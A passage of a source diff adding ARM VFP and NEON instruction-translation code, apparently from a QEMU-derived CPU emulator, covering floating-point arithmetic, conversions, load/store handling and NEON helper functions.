gen_mov_F1_vreg(s, dp, rm); + } + + for (;;) { + /* Perform the calculation. */ + switch (op) { + case 0: /* VMLA: fd + (fn * fm) */ + /* Note that order of inputs to the add matters for NaNs */ + gen_vfp_F1_mul(s, dp); + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_add(s, dp); + break; + case 1: /* VMLS: fd + -(fn * fm) */ + gen_vfp_mul(s, dp); + gen_vfp_F1_neg(s, dp); + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_add(s, dp); + break; + case 2: /* VNMLS: -fd + (fn * fm) */ + /* Note that it isn't valid to replace (-A + B) with (B - A) + * or similar plausible looking simplifications + * because this will give wrong results for NaNs. + */ + gen_vfp_F1_mul(s, dp); + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_neg(s, dp); + gen_vfp_add(s, dp); + break; + case 3: /* VNMLA: -fd + -(fn * fm) */ + gen_vfp_mul(s, dp); + gen_vfp_F1_neg(s, dp); + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_neg(s, dp); + gen_vfp_add(s, dp); + break; + case 4: /* mul: fn * fm */ + gen_vfp_mul(s, dp); + break; + case 5: /* nmul: -(fn * fm) */ + gen_vfp_mul(s, dp); + gen_vfp_neg(s, dp); + break; + case 6: /* add: fn + fm */ + gen_vfp_add(s, dp); + break; + case 7: /* sub: fn - fm */ + gen_vfp_sub(s, dp); + break; + case 8: /* div: fn / fm */ + gen_vfp_div(s, dp); + break; + case 10: /* VFNMA : fd = muladd(-fd, fn, fm) */ + case 11: /* VFNMS : fd = muladd(-fd, -fn, fm) */ + case 12: /* VFMA : fd = muladd( fd, fn, fm) */ + case 13: /* VFMS : fd = muladd( fd, -fn, fm) */ + /* These are fused multiply-add, and must be done as one + * floating point operation with no rounding between the + * multiplication and addition steps. + * NB that doing the negations here as separate steps is + * correct : an input NaN should come out with its sign bit + * flipped if it is a negated-input. + */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP4)) { + return 1; + } + if (dp) { + TCGv_ptr fpst; + TCGv_i64 frd; + if (op & 1) { + /* VFNMS, VFMS */ + gen_helper_vfp_negd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d); + } + frd = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ld_f64(tcg_ctx, frd, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + if (op & 2) { + /* VFNMA, VFNMS */ + gen_helper_vfp_negd(tcg_ctx, frd, frd); + } + fpst = get_fpstatus_ptr(s, 0); + gen_helper_vfp_muladdd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, + tcg_ctx->cpu_F1d, frd, fpst); + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i64(tcg_ctx, frd); + } else { + TCGv_ptr fpst; + TCGv_i32 frd; + if (op & 1) { + /* VFNMS, VFMS */ + gen_helper_vfp_negs(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s); + } + frd = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f32(tcg_ctx, frd, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + if (op & 2) { + gen_helper_vfp_negs(tcg_ctx, frd, frd); + } + fpst = get_fpstatus_ptr(s, 0); + gen_helper_vfp_muladds(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, + tcg_ctx->cpu_F1s, frd, fpst); + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i32(tcg_ctx, frd); + } + break; + case 14: /* fconst */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + + n = (insn << 12) & 0x80000000; + i = ((insn >> 12) & 0x70) | (insn & 0xf); + if (dp) { + if (i & 0x40) + i |= 0x3f80; + else + i |= 0x4000; + n |= i << 16; + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_F0d, ((uint64_t)n) << 32); + } else { + if (i & 0x40) + i |= 0x780; + else + i |= 0x800; + n |= i << 19; + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_F0s, n); + } + break; + case 15: /* extension space */ + switch (rn) { + case 0: /* cpy */ + /* no-op */ + break; + case 1: /* abs */ + gen_vfp_abs(s, dp); + break; + case 2: /* neg */ + gen_vfp_neg(s, dp); + break; + case 3: /* sqrt */ + gen_vfp_sqrt(s, dp); + break; + case 4: /* vcvtb.f32.f16, vcvtb.f64.f16 */ + tmp = gen_vfp_mrs(s); + tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); + if (dp) { + gen_helper_vfp_fcvt_f16_to_f64(tcg_ctx, tcg_ctx->cpu_F0d, tmp, + tcg_ctx->cpu_env); + } else { + gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp, + tcg_ctx->cpu_env); + } + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 5: /* vcvtt.f32.f16, vcvtt.f64.f16 */ + tmp = gen_vfp_mrs(s); + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); + if (dp) { + gen_helper_vfp_fcvt_f16_to_f64(tcg_ctx, tcg_ctx->cpu_F0d, tmp, + tcg_ctx->cpu_env); + } else { + gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp, + tcg_ctx->cpu_env); + } + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 6: /* vcvtb.f16.f32, vcvtb.f16.f64 */ + tmp = tcg_temp_new_i32(tcg_ctx); + if (dp) { + gen_helper_vfp_fcvt_f64_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0d, + tcg_ctx->cpu_env); + } else { + gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0s, + tcg_ctx->cpu_env); + } + gen_mov_F0_vreg(s, 0, rd); + tmp2 = gen_vfp_mrs(s); + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xffff0000); + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + gen_vfp_msr(s, tmp); + break; + case 7: /* vcvtt.f16.f32, vcvtt.f16.f64 */ + tmp = tcg_temp_new_i32(tcg_ctx); + if (dp) { + gen_helper_vfp_fcvt_f64_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0d, + tcg_ctx->cpu_env); + } else { + gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0s, + tcg_ctx->cpu_env); + } + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 16); + gen_mov_F0_vreg(s, 0, rd); + tmp2 = gen_vfp_mrs(s); + tcg_gen_ext16u_i32(tcg_ctx, tmp2, tmp2); + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + gen_vfp_msr(s, tmp); + break; + case 8: /* cmp */ + gen_vfp_cmp(s, dp); + break; + case 9: /* cmpe */ + gen_vfp_cmpe(s, dp); + break; + case 10: /* cmpz */ + gen_vfp_cmp(s, dp); + break; + case 11: /* cmpez */ + gen_vfp_F1_ld0(s, dp); + gen_vfp_cmpe(s, dp); + break; + case 12: /* vrintr */ + { + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + if (dp) { + gen_helper_rintd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, fpst); + } else { + gen_helper_rints(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpst); + } + tcg_temp_free_ptr(tcg_ctx, fpst); + break; + } + case 13: /* vrintz */ + { + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + TCGv_i32 tcg_rmode; + tcg_rmode = tcg_const_i32(tcg_ctx, float_round_to_zero); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + if (dp) { + gen_helper_rintd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, fpst); + } else { + gen_helper_rints(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpst); + } + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + tcg_temp_free_ptr(tcg_ctx, fpst); + break; + } + case 14: /* vrintx */ + { + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + if (dp) { + gen_helper_rintd_exact(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, fpst); + } else { + gen_helper_rints_exact(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpst); + } + tcg_temp_free_ptr(tcg_ctx, fpst); + break; + } + case 15: /* single<->double conversion */ + if (dp) + gen_helper_vfp_fcvtsd(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0d, tcg_ctx->cpu_env); + else + gen_helper_vfp_fcvtds(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); + break; + case 16: /* fuito */ + gen_vfp_uito(s, dp, 0); + break; + case 17: /* fsito */ + gen_vfp_sito(s, dp, 0); + break; + case 20: /* fshto */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_shto(s, dp, 16 - rm, 0); + break; + case 21: /* fslto */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_slto(s, dp, 32 - rm, 0); + break; + case 22: /* fuhto */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_uhto(s, dp, 16 - rm, 0); + break; + case 23: /* fulto */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_ulto(s, dp, 32 - rm, 0); + break; + case 24: /* ftoui */ + gen_vfp_toui(s, dp, 0); + break; + case 25: /* ftouiz */ + gen_vfp_touiz(s, dp, 0); + break; + case 26: /* ftosi */ + gen_vfp_tosi(s, dp, 0); + break; + case 27: /* ftosiz */ + gen_vfp_tosiz(s, dp, 0); + break; + case 28: /* ftosh */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_tosh(s, dp, 16 - rm, 0); + break; + case 29: /* ftosl */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_tosl(s, dp, 32 - rm, 0); + break; + case 30: /* ftouh */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_touh(s, dp, 16 - rm, 0); + break; + case 31: /* ftoul */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_toul(s, dp, 32 - rm, 0); + break; + default: /* undefined */ + return 1; + } + break; + default: /* undefined */ + return 1; + } + + /* Write back the result. */ + if (op == 15 && (rn >= 8 && rn <= 11)) { + /* Comparison, do nothing. */ + } else if (op == 15 && dp && ((rn & 0x1c) == 0x18 || + (rn & 0x1e) == 0x6)) { + /* VCVT double to int: always integer result. + * VCVT double to half precision is always a single + * precision result. + */ + gen_mov_vreg_F0(s, 0, rd); + } else if (op == 15 && rn == 15) { + /* conversion */ + gen_mov_vreg_F0(s, !dp, rd); + } else { + gen_mov_vreg_F0(s, dp, rd); + } + + /* break out of the loop if we have finished */ + if (veclen == 0) + break; + + if (op == 15 && delta_m == 0) { + /* single source one-many */ + while (veclen--) { + rd = ((rd + delta_d) & (bank_mask - 1)) + | (rd & bank_mask); + gen_mov_vreg_F0(s, dp, rd); + } + break; + } + /* Setup the next operands. */ + veclen--; + rd = ((rd + delta_d) & (bank_mask - 1)) + | (rd & bank_mask); + + if (op == 15) { + /* One source operand. */ + rm = ((rm + delta_m) & (bank_mask - 1)) + | (rm & bank_mask); + gen_mov_F0_vreg(s, dp, rm); + } else { + /* Two source operands. */ + rn = ((rn + delta_d) & (bank_mask - 1)) + | (rn & bank_mask); + gen_mov_F0_vreg(s, dp, rn); + if (delta_m) { + rm = ((rm + delta_m) & (bank_mask - 1)) + | (rm & bank_mask); + gen_mov_F1_vreg(s, dp, rm); + } + } + } + } + break; + case 0xc: + case 0xd: + if ((insn & 0x03e00000) == 0x00400000) { + /* two-register transfer */ + rn = (insn >> 16) & 0xf; + rd = (insn >> 12) & 0xf; + if (dp) { + VFP_DREG_M(rm, insn); + } else { + rm = VFP_SREG_M(insn); + } + + if (insn & ARM_CP_RW_BIT) { + /* vfp->arm */ + if (dp) { + gen_mov_F0_vreg(s, 0, rm * 2); + tmp = gen_vfp_mrs(s); + store_reg(s, rd, tmp); + gen_mov_F0_vreg(s, 0, rm * 2 + 1); + tmp = gen_vfp_mrs(s); + store_reg(s, rn, tmp); + } else { + gen_mov_F0_vreg(s, 0, rm); + tmp = gen_vfp_mrs(s); + store_reg(s, rd, tmp); + gen_mov_F0_vreg(s, 0, rm + 1); + tmp = gen_vfp_mrs(s); + store_reg(s, rn, tmp); + } + } else { + /* arm->vfp */ + if (dp) { + tmp = load_reg(s, rd); + gen_vfp_msr(s, tmp); + gen_mov_vreg_F0(s, 0, rm * 2); + tmp = load_reg(s, rn); + gen_vfp_msr(s, tmp); + gen_mov_vreg_F0(s, 0, rm * 2 + 1); + } else { + tmp = load_reg(s, rd); + gen_vfp_msr(s, tmp); + gen_mov_vreg_F0(s, 0, rm); + tmp = load_reg(s, rn); + gen_vfp_msr(s, tmp); + gen_mov_vreg_F0(s, 0, rm + 1); + } + } + } else { + /* Load/store */ + rn = (insn >> 16) & 0xf; + if (dp) + VFP_DREG_D(rd, insn); + else + rd = VFP_SREG_D(insn); + if ((insn & 0x01200000) == 0x01000000) { + /* Single load/store */ + offset = (insn & 0xff) << 2; + if ((insn & (1 << 23)) == 0) + offset = 0-offset; + if (s->thumb && rn == 15) { + /* This is actually UNPREDICTABLE */ + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, addr, s->pc & ~2); + } else { + addr = load_reg(s, rn); + } + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + if (insn & (1 << 20)) { + gen_vfp_ld(s, dp, addr); + gen_mov_vreg_F0(s, dp, rd); + } else { + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_st(s, dp, addr); + } + tcg_temp_free_i32(tcg_ctx, addr); + } else { + /* load/store multiple */ + int w = insn & (1 << 21); + if (dp) + n = (insn >> 1) & 0x7f; + else + n = insn & 0xff; + + if (w && !(((insn >> 23) ^ (insn >> 24)) & 1)) { + /* P == U , W == 1 => UNDEF */ + return 1; + } + if (n == 0 || (rd + n) > 32 || (dp && n > 16)) { + /* UNPREDICTABLE cases for bad immediates: we choose to + * UNDEF to avoid generating huge numbers of TCG ops + */ + return 1; + } + if (rn == 15 && w) { + /* writeback to PC is UNPREDICTABLE, we choose to UNDEF */ + return 1; + } + + if (s->thumb && rn == 15) { + /* This is actually UNPREDICTABLE */ + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, addr, s->pc & ~2); + } else { + addr = load_reg(s, rn); + } + if (insn & (1 << 24)) /* pre-decrement */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 0-((insn & 0xff) << 2)); + + if (dp) + offset = 8; + else + offset = 4; + for (i = 0; i < n; i++) { + if (insn & ARM_CP_RW_BIT) { + /* load */ + gen_vfp_ld(s, dp, addr); + gen_mov_vreg_F0(s, dp, rd + i); + } else { + /* store */ + gen_mov_F0_vreg(s, dp, rd + i); + gen_vfp_st(s, dp, addr); + } + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + } + if (w) { + /* writeback */ + if (insn & (1 << 24)) + offset = (0-offset) * n; + else if (dp && (insn & 1)) + offset = 4; + else + offset = 0; + + if (offset != 0) + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + } + } + break; + default: + /* Should never happen. */ + return 1; + } + return 0; +} + +static inline void gen_goto_tb(DisasContext *s, int n, target_ulong dest) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TranslationBlock *tb; + + tb = s->tb; + if ((tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK)) { + tcg_gen_goto_tb(tcg_ctx, n); + gen_set_pc_im(s, dest); + tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + n); + } else { + gen_set_pc_im(s, dest); + tcg_gen_exit_tb(tcg_ctx, 0); + } +} + +static inline void gen_jmp(DisasContext *s, uint32_t dest) +{ + if (unlikely(s->singlestep_enabled || s->ss_active)) { + /* An indirect jump so that we still trigger the debug exception. */ + if (s->thumb) + dest |= 1; + gen_bx_im(s, dest); + } else { + gen_goto_tb(s, 0, dest); + s->is_jmp = DISAS_TB_JUMP; + } +} + +static inline void gen_mulxy(DisasContext *s, TCGv_i32 t0, TCGv_i32 t1, int x, int y) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (x) + tcg_gen_sari_i32(tcg_ctx, t0, t0, 16); + else + gen_sxth(t0); + if (y) + tcg_gen_sari_i32(tcg_ctx, t1, t1, 16); + else + gen_sxth(t1); + tcg_gen_mul_i32(tcg_ctx, t0, t0, t1); +} + +/* Return the mask of PSR bits set by a MSR instruction. */ +static uint32_t msr_mask(DisasContext *s, int flags, int spsr) +{ + uint32_t mask; + + mask = 0; + if (flags & (1 << 0)) + mask |= 0xff; + if (flags & (1 << 1)) + mask |= 0xff00; + if (flags & (1 << 2)) + mask |= 0xff0000; + if (flags & (1 << 3)) + mask |= 0xff000000; + + /* Mask out undefined bits. */ + mask &= ~CPSR_RESERVED; + if (!arm_dc_feature(s, ARM_FEATURE_V4T)) { + mask &= ~CPSR_T; + } + if (!arm_dc_feature(s, ARM_FEATURE_V5)) { + mask &= ~CPSR_Q; /* V5TE in reality*/ + } + if (!arm_dc_feature(s, ARM_FEATURE_V6)) { + mask &= ~(CPSR_E | CPSR_GE); + } + if (!arm_dc_feature(s, ARM_FEATURE_THUMB2)) { + mask &= ~CPSR_IT; + } + /* Mask out execution state and reserved bits. */ + if (!spsr) { + mask &= ~(CPSR_EXEC | CPSR_RESERVED); + } + /* Mask out privileged bits. */ + if (IS_USER(s)) + mask &= CPSR_USER; + return mask; +} + +/* Returns nonzero if access to the PSR is not permitted. Marks t0 as dead. */ +static int gen_set_psr(DisasContext *s, uint32_t mask, int spsr, TCGv_i32 t0) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp; + if (spsr) { + /* ??? This is also undefined in system mode. */ + if (IS_USER(s)) + return 1; + + tmp = load_cpu_field(s->uc, spsr); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, ~mask); + tcg_gen_andi_i32(tcg_ctx, t0, t0, mask); + tcg_gen_or_i32(tcg_ctx, tmp, tmp, t0); + store_cpu_field(tcg_ctx, tmp, spsr); + } else { + gen_set_cpsr(s, t0, mask); + } + tcg_temp_free_i32(tcg_ctx, t0); + gen_lookup_tb(s); + return 0; +} + +/* Returns nonzero if access to the PSR is not permitted. */ +static int gen_set_psr_im(DisasContext *s, uint32_t mask, int spsr, uint32_t val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp; + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, val); + return gen_set_psr(s, mask, spsr, tmp); +} + +/* Generate an old-style exception return. Marks pc as dead. */ +static void gen_exception_return(DisasContext *s, TCGv_i32 pc) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp; + store_reg(s, 15, pc); + tmp = load_cpu_field(s->uc, spsr); + gen_set_cpsr(s, tmp, CPSR_ERET_MASK); + tcg_temp_free_i32(tcg_ctx, tmp); + s->is_jmp = DISAS_UPDATE; +} + +/* Generate a v6 exception return. Marks both values as dead. */ +static void gen_rfe(DisasContext *s, TCGv_i32 pc, TCGv_i32 cpsr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + gen_set_cpsr(s, cpsr, CPSR_ERET_MASK); + tcg_temp_free_i32(tcg_ctx, cpsr); + store_reg(s, 15, pc); + s->is_jmp = DISAS_UPDATE; +} + +static void gen_nop_hint(DisasContext *s, int val) +{ + switch (val) { + case 3: /* wfi */ + gen_set_pc_im(s, s->pc); + s->is_jmp = DISAS_WFI; + break; + case 2: /* wfe */ + gen_set_pc_im(s, s->pc); + s->is_jmp = DISAS_WFE; + break; + case 4: /* sev */ + case 5: /* sevl */ + /* TODO: Implement SEV, SEVL and WFE. May help SMP performance. */ + default: /* nop */ + break; + } +} + +#define CPU_V001 tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1 + +static inline void gen_neon_add(DisasContext *s, int size, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (size) { + case 0: gen_helper_neon_add_u8(tcg_ctx, t0, t0, t1); break; + case 1: gen_helper_neon_add_u16(tcg_ctx, t0, t0, t1); break; + case 2: tcg_gen_add_i32(tcg_ctx, t0, t0, t1); break; + default: abort(); + } +} + +static inline void gen_neon_rsb(DisasContext *s, int size, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (size) { + case 0: gen_helper_neon_sub_u8(tcg_ctx, t0, t1, t0); break; + case 1: gen_helper_neon_sub_u16(tcg_ctx, t0, t1, t0); break; + case 2: tcg_gen_sub_i32(tcg_ctx, t0, t1, t0); break; + default: return; + } +} + +/* 32-bit pairwise ops end up the same as the elementwise versions. */ +#define gen_helper_neon_pmax_s32 gen_helper_neon_max_s32 +#define gen_helper_neon_pmax_u32 gen_helper_neon_max_u32 +#define gen_helper_neon_pmin_s32 gen_helper_neon_min_s32 +#define gen_helper_neon_pmin_u32 gen_helper_neon_min_u32 + +#define GEN_NEON_INTEGER_OP_ENV(name) do { \ + switch ((size << 1) | u) { \ + case 0: \ + gen_helper_neon_##name##_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ + break; \ + case 1: \ + gen_helper_neon_##name##_u8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ + break; \ + case 2: \ + gen_helper_neon_##name##_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ + break; \ + case 3: \ + gen_helper_neon_##name##_u16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ + break; \ + case 4: \ + gen_helper_neon_##name##_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ + break; \ + case 5: \ + gen_helper_neon_##name##_u32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \ + break; \ + default: return 1; \ + }} while (0) + +#define GEN_NEON_INTEGER_OP(name) do { \ + switch ((size << 1) | u) { \ + case 0: \ + gen_helper_neon_##name##_s8(tcg_ctx, tmp, tmp, tmp2); \ + break; \ + case 1: \ + gen_helper_neon_##name##_u8(tcg_ctx, tmp, tmp, tmp2); \ + break; \ + case 2: \ + gen_helper_neon_##name##_s16(tcg_ctx, tmp, tmp, tmp2); \ + break; \ + case 3: \ + gen_helper_neon_##name##_u16(tcg_ctx, tmp, tmp, tmp2); \ + break; \ + case 4: \ + gen_helper_neon_##name##_s32(tcg_ctx, tmp, tmp, tmp2); \ + break; \ + case 5: \ + gen_helper_neon_##name##_u32(tcg_ctx, tmp, tmp, tmp2); \ + break; \ + default: return 1; \ + }} while (0) + +static TCGv_i32 neon_load_scratch(TCGContext *tcg_ctx, int scratch) +{ + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, vfp.scratch[scratch])); + return tmp; +} + +static void neon_store_scratch(TCGContext *tcg_ctx, int scratch, TCGv_i32 var) +{ + tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, vfp.scratch[scratch])); + tcg_temp_free_i32(tcg_ctx, var); +} + +static inline TCGv_i32 neon_get_scalar(DisasContext *s, int size, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp; + if (size == 1) { + tmp = neon_load_reg(tcg_ctx, reg & 7, reg >> 4); + if (reg & 8) { + gen_neon_dup_high16(s, tmp); + } else { + gen_neon_dup_low16(s, tmp); + } + } else { + tmp = neon_load_reg(tcg_ctx, reg & 15, reg >> 4); + } + return tmp; +} + +static int gen_neon_unzip(TCGContext *tcg_ctx, int rd, int rm, int size, int q) +{ + TCGv_i32 tmp, tmp2; + if (!q && size == 2) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rm); + if (q) { + switch (size) { + case 0: + gen_helper_neon_qunzip8(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + break; + case 1: + gen_helper_neon_qunzip16(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + break; + case 2: + gen_helper_neon_qunzip32(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + break; + default: + abort(); + } + } else { + switch (size) { + case 0: + gen_helper_neon_unzip8(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + break; + case 1: + gen_helper_neon_unzip16(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + break; + default: + abort(); + } + } + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + return 0; +} + +static int gen_neon_zip(TCGContext *tcg_ctx, int rd, int rm, int size, int q) +{ + TCGv_i32 tmp, tmp2; + if (!q && size == 2) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rm); + if (q) { + switch (size) { + case 0: + gen_helper_neon_qzip8(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + break; + case 1: + gen_helper_neon_qzip16(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + break; + case 2: + gen_helper_neon_qzip32(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + break; + default: + abort(); + } + } else { + switch (size) { + case 0: + gen_helper_neon_zip8(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + break; + case 1: + gen_helper_neon_zip16(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + break; + default: + abort(); + } + } + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + return 0; +} + +static void gen_neon_trn_u8(TCGContext *tcg_ctx, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGv_i32 rd, tmp; + + rd = tcg_temp_new_i32(tcg_ctx); + tmp = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_shli_i32(tcg_ctx, rd, t0, 8); + tcg_gen_andi_i32(tcg_ctx, rd, rd, 0xff00ff00); + tcg_gen_andi_i32(tcg_ctx, tmp, t1, 0x00ff00ff); + tcg_gen_or_i32(tcg_ctx, rd, rd, tmp); + + tcg_gen_shri_i32(tcg_ctx, t1, t1, 8); + tcg_gen_andi_i32(tcg_ctx, t1, t1, 0x00ff00ff); + tcg_gen_andi_i32(tcg_ctx, tmp, t0, 0xff00ff00); + tcg_gen_or_i32(tcg_ctx, t1, t1, tmp); + tcg_gen_mov_i32(tcg_ctx, t0, rd); + + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, rd); +} + +static void gen_neon_trn_u16(TCGContext *tcg_ctx, TCGv_i32 t0, TCGv_i32 t1) +{ + TCGv_i32 rd, tmp; + + rd = tcg_temp_new_i32(tcg_ctx); + tmp = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_shli_i32(tcg_ctx, rd, t0, 16); + tcg_gen_andi_i32(tcg_ctx, tmp, t1, 0xffff); + tcg_gen_or_i32(tcg_ctx, rd, rd, tmp); + tcg_gen_shri_i32(tcg_ctx, t1, t1, 16); + tcg_gen_andi_i32(tcg_ctx, tmp, t0, 0xffff0000); + tcg_gen_or_i32(tcg_ctx, t1, t1, tmp); + tcg_gen_mov_i32(tcg_ctx, t0, rd); + + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, rd); +} + + +static struct { + int nregs; + int interleave; + int spacing; +} neon_ls_element_type[11] = { + {4, 4, 1}, + {4, 4, 2}, + {4, 1, 1}, + {4, 2, 1}, + {3, 3, 1}, + {3, 3, 2}, + {3, 1, 1}, + {1, 1, 1}, + {2, 2, 1}, + {2, 2, 2}, + {2, 1, 1} +}; + +/* Translate a NEON load/store element instruction. Return nonzero if the + instruction is invalid. */ +static int disas_neon_ls_insn(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd, rn, rm; + int op; + int nregs; + int interleave; + int spacing; + int stride; + int size; + int reg; + int pass; + int load; + int shift; + int n; + TCGv_i32 addr; + TCGv_i32 tmp; + TCGv_i32 tmp2; + TCGv_i64 tmp64; + + /* FIXME: this access check should not take precedence over UNDEF + * for invalid encodings; we will generate incorrect syndrome information + * for attempts to execute invalid vfp/neon encodings with FP disabled. + */ + if (!s->cpacr_fpen) { + gen_exception_insn(s, 4, EXCP_UDEF, + syn_fp_access_trap(1, 0xe, s->thumb)); + return 0; + } + + if (!s->vfp_enabled) + return 1; + VFP_DREG_D(rd, insn); + rn = (insn >> 16) & 0xf; + rm = insn & 0xf; + load = (insn & (1 << 21)) != 0; + if ((insn & (1 << 23)) == 0) { + /* Load store all elements. */ + op = (insn >> 8) & 0xf; + size = (insn >> 6) & 3; + if (op > 10) + return 1; + 